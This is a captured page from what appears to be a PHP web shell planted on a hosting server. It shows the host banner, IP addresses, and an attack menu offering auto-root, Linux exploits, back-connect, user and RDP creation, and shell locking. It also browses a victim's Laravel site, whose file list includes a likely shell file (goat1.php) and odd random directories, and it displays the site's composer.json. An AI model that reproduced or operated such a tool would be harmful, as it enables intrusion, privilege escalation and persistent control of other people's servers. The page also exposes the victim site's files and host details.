Linux server1.signalhg.team 4.18.0-553.134.1.el8_10.x86_64 #1 SMP Tue Jun 16 16:05:57 EDT 2026 x86_64
Apache
: 209.74.80.147 | : 216.73.216.252
150 Domain
8.1.34
signgwph
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
signgwph /
signaltechdemo21.com /
[ HOME SHELL ]
Name
Size
Permission
Action
.well-known
[ DIR ]
drwxr-xr-x
app
[ DIR ]
drwxrwxr-x
bootstrap
[ DIR ]
drwxrwxr-x
config
[ DIR ]
drwxrwxr-x
database
[ DIR ]
drwxrwxr-x
fugabxq
[ DIR ]
drwxr-xr-x
genzwvp
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
jouwbkv
[ DIR ]
drwxr-xr-x
main-file
[ DIR ]
drwxrwxr-x
node_modules
[ DIR ]
drwxrwxr-x
pcwoqek
[ DIR ]
drwxr-xr-x
public
[ DIR ]
drwxrwxrwx
resources
[ DIR ]
drwxrwxr-x
routes
[ DIR ]
drwxrwxr-x
rzng1fd
[ DIR ]
drwxr-xr-x
snfvkeq
[ DIR ]
drwxr-xr-x
storage
[ DIR ]
drwxrwxrwx
tests
[ DIR ]
drwxrwxr-x
vendor
[ DIR ]
drwxrwxr-x
xiqorbm
[ DIR ]
drwxr-xr-x
zstpryo
[ DIR ]
drwxr-xr-x
.DS_Store
8
KB
-rw-rw-r--
.editorconfig
258
B
-rw-rw-r--
.env
611
B
-rwxrwxrwx
.gitattributes
160
B
-rw-rw-r--
.gitignore
364
B
-rw-rw-r--
.htaccess
479
B
-rw-r--r--
.prettierignore
74
B
-rw-rw-r--
.prettierrc
438
B
-rw-rw-r--
artisan
425
B
-rwxrwxr-x
codecanyon-RWEj9LyP-task-tasks...
184.53
MB
-rw-r--r--
components.json
509
B
-rw-rw-r--
composer.json
3.55
KB
-rw-rw-r--
composer.lock
489.06
KB
-rw-rw-r--
error_log
258
B
-rw-r--r--
eslint.config.js
1.25
KB
-rw-rw-r--
extract-translations.php
2.87
KB
-rw-rw-r--
goat1.php
143.87
KB
-rw-r--r--
index.php
1.18
KB
-rw-r--r--
license-pcae.php
629
B
-rw-r--r--
package-lock.json
461.05
KB
-rw-rw-r--
package.json
3.79
KB
-rw-rw-r--
phpunit.xml
1.15
KB
-rw-rw-r--
robots.txt
86
B
-rw-r--r--
tsconfig.json
12.67
KB
-rw-rw-r--
vite.config.ts
1.88
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : composer.json
{ "$schema": "https://getcomposer.org/schema.json", "name": "laravel/react-starter-kit", "type": "project", "description": "The skeleton application for the Laravel framework.", "keywords": [ "laravel", "framework" ], "license": "MIT", "require": { "php": "^8.2", "authorizenet/authorizenet": "^2.0", "cashfree/cashfree-pg": "^5.0", "coingate/coingate-php": "^4.1", "fedapay/fedapay-php": "^0.4.7", "google/apiclient": "^2.18", "inertiajs/inertia-laravel": "^2.0", "iyzico/iyzipay-php": "^2.0", "lab404/laravel-impersonate": "^1.7", "larabug/larabug": "^3.3", "laravel/framework": "^12.0", "laravel/tinker": "^2.10.1", "league/flysystem-aws-s3-v3": "^3.29", "aws/aws-sdk-php": "^3.368", "mercadopago/dx-php": "^2.5", "mollie/mollie-api-php": "^3.1", "openai-php/client": "^0.14.0", "paytabscom/laravel_paytabs": "^1.9", "rachidlaasri/laravel-installer": "^4.1", "razorpay/razorpay": "^2.8", "spatie/laravel-medialibrary": "^11.13", "spatie/laravel-permission": "^6.18", "stripe/stripe-php": "^17.3", "tightenco/ziggy": "^2.4", "yoomoney/yookassa-sdk-php": "^3.8" }, "require-dev": { "fakerphp/faker": "^1.23", "laravel/pail": "^1.2.2", "laravel/pint": "^1.18", "laravel/sail": "^1.41", "mockery/mockery": "^1.6", "nunomaduro/collision": "^8.6", "pestphp/pest": "^3.8", "pestphp/pest-plugin-laravel": "^3.1" }, "autoload": { "psr-4": { "App\\": "app/", "Database\\Factories\\": "database/factories/", "Database\\Seeders\\": "database/seeders/" }, "files": [ "app/Helpers/helper.php", "app/Helpers/SaasHelper.php" ] }, "autoload-dev": { "psr-4": { "Tests\\": "tests/" } }, "scripts": { "post-autoload-dump": [ "Illuminate\\Foundation\\ComposerScripts::postAutoloadDump", "@php artisan package:discover --ansi" ], "post-root-package-install": [ "@php -r \"file_exists('.env') || copy('.env.example', '.env');\"" ], "post-create-project-cmd": [ "@php artisan key:generate --ansi", "@php -r \"file_exists('database/database.sqlite') || touch('database/database.sqlite');\"", "@php artisan migrate --graceful --ansi" ], "dev": [ "Composer\\Config::disableProcessTimeout", "npx concurrently -c \"#93c5fd,#c4b5fd,#fb7185,#fdba74\" \"php artisan serve\" \"php artisan queue:listen --tries=1\" \"php artisan pail --timeout=0\" \"npm run dev\" --names=server,queue,logs,vite" ], "dev:ssr": [ "npm run build:ssr", "Composer\\Config::disableProcessTimeout", "npx concurrently -c \"#93c5fd,#c4b5fd,#fb7185,#fdba74\" \"php artisan serve\" \"php artisan queue:listen --tries=1\" \"php artisan pail --timeout=0\" \"php artisan inertia:start-ssr\" --names=server,queue,logs,ssr" ] }, "extra": { "laravel": { "dont-discover": [] } }, "config": { "optimize-autoloader": true, "preferred-install": "dist", "sort-packages": true, "allow-plugins": { "pestphp/pest-plugin": true, "php-http/discovery": true } }, "minimum-stability": "stable", "prefer-stable": true }
Close